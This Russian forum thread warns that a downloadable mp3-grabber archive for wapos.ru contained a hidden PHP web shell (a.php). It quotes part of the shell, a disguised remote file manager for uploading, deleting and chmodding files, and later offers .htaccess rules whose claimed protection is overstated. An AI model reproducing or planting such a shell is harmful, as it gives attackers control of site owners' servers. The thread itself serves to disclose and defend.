Грабб mp3 с wapos.ru + shell в комплекте!

Тема закрыта
600
.
Кто качал грабб музыки вапос.ру!обратите внимание на файл a.php !
<?
// CHAT POWERED : WAPs.KZ
// ICQ : 354741
// Email : KZsergeyKZ@rambler.ru
// WAPs.KZ CHAT Version 1.0
Error_Reporting(E_ALL & ~E_NOTICE);
if(empty($_GET['zip']) and empty($_GET['download']) & empty($_GET['img'])){
list($msec,$sec)=explode(chr(32),microtime());
$HeadTime=$sec+$msec;
echo'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Eraser</title>
<style type="text/css">
body {
font-family:Comic Sans MS;
color:#FF0000;
background-color:#FFFFCC;}
a {
color:#00AA00;
text-decoration:underline;}
a:hover {
color: red;
text-decoration: none;
position: relative;
top: 1px; left: 1px;}
a:visited {
color: 006600;}
b {
color:#008800;
font-style:bold;}
table{
background-color: #FFFFFF;
border: 1px solid #FF8800;}
td{
margin: 0px;
padding: 0px;
border: 1px solid #FF8800;
background-color: #FFCE52;
color: #f00; }</style>
</head><body>';}
/////////////////////////////////
if(empty($_GET['r']) & empty($_GET['input']) & empty($_GET['ren']) & empty($_GET['setchmod']) & empty($_GET['download']) & empty($_GET['up']) & empty($_GET['upload']) & empty($_GET['chmod']) & empty($_GET['rename']) & empty($_GET['rmdir']) & empty($_GET['made']) & empty($_GET['create']) & empty($_GET['del']) & empty($_GET['deldir']) & empty($_GET['f']) & empty($_GET['edit']) & empty($_GET['zip'])& empty($_GET['img'])){
echo'<b><font color="#FF0000">Файл менеджер</font></b><hr>';
if(empty($_GET['d'])){$d="./";}
else{$d=$_GET['d'];}
if($d=="./"){$vverh='.'.$d;}
if($d!=="./"){$vverh=$d.'../';}
echo'<a href="?d='.$vverh.'">На уровень вверх</a><br>
<a href="?create='.$d.'">Создать файл здесь</a><br>
<a href="?up='.$d.'">Загрузить файл сюда</a><br>
Вы находитель в каталоге: <font color="#FF0000"><b>'.$d.'</b></font><br>';
echo '<font color="#FF0000">Директории:</font><table>';
$dir = opendir($d);
while($file = readdir($dir)){
if(is_dir($d.'/'.$file)){
if($file != "." && $file != ".."){
$mod=substr(sprintf("%o",fileperms($d.'/'.$file)),-3);
echo'<tr><td width="350"><img src="?img=1" alt=""><a href="?d='.$d.$file.'/">'.$file.'</a></td><td>DIR</td><td>'.$mod.'</td><td><a href="?zip='.$d.$file.'/"><font color="#0000FF">[zip]</font></a></td><td><a href="?deldir='.$d.$file.'/"><font color="#FF0000">[del]</font></a></td><td><a href="?ren='.$d.$file.'/"><font color="#000000">[rename]</font></a></td><td><a href="?chmod='.$d.$file.'/"><font color="#FF3300">[chmod]</font></a></td><td><a href="?rmdir='.$d.$file.'/"><font color="#00FF00">[revome]</font></a></td></tr>';}}}
Я думаю достаточно.
.
Ух а я хотел скачат слава богу пронесло спасибо за инфо
.
¤
Граб из темы с грабами удален. Всем кто скачал его, и тем более ставил - удалите оттуда файл a.php!
.
VARG, Накажи еще виновника того кто его выложил и еще надо проверить все его файлы если есть такая возможность
.
¤
Архив заменил, вроде больше ничего там нет, но т.к. с грабами дел принципиально не имею, советую тем кто разбирается посмотреть на всякий случай.
Новый архив здесь: Грабберы под JohnCMS
Выложил сей подлый архив товарищ Мурадхан. Однако неизвестно он ли вложил в архив шелл или не он, поэтому сходу обвинять не стоит, но впредь советую всем быть внимательнее и тщательно проверять все что качаете.
.
Я тоже скачал но слав богу не поставил пока спасибо
.
Юзер кидала, не рекомендуется иметь с ним дело
Вот прикол...он у меня с пол года стоял...
.
Юзер кидала, не рекомендуется иметь с ним дело
txt, Уже присмотрел сайт? Аяяй не хорошо
.
Юзер кидала, не рекомендуется иметь с ним дело
txt, гг...поэтому и не жаловались) Потому что ты ещё не знаешь как шеллом пользоваться=) Шучу...просто переходишь по адресу шелла и любуешься.
.
Krite
Для тех кто не проверяет архивы на шеллы пропишите в .htaccess

RewriteCond %{QUERY_STRING} ..*\/ [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

И вряд ли что-то сможет "хакер" сделать с ним.
при попытке перейти в какую нибудь категорию через шелл выдаст ошибку 403.
Всего: 27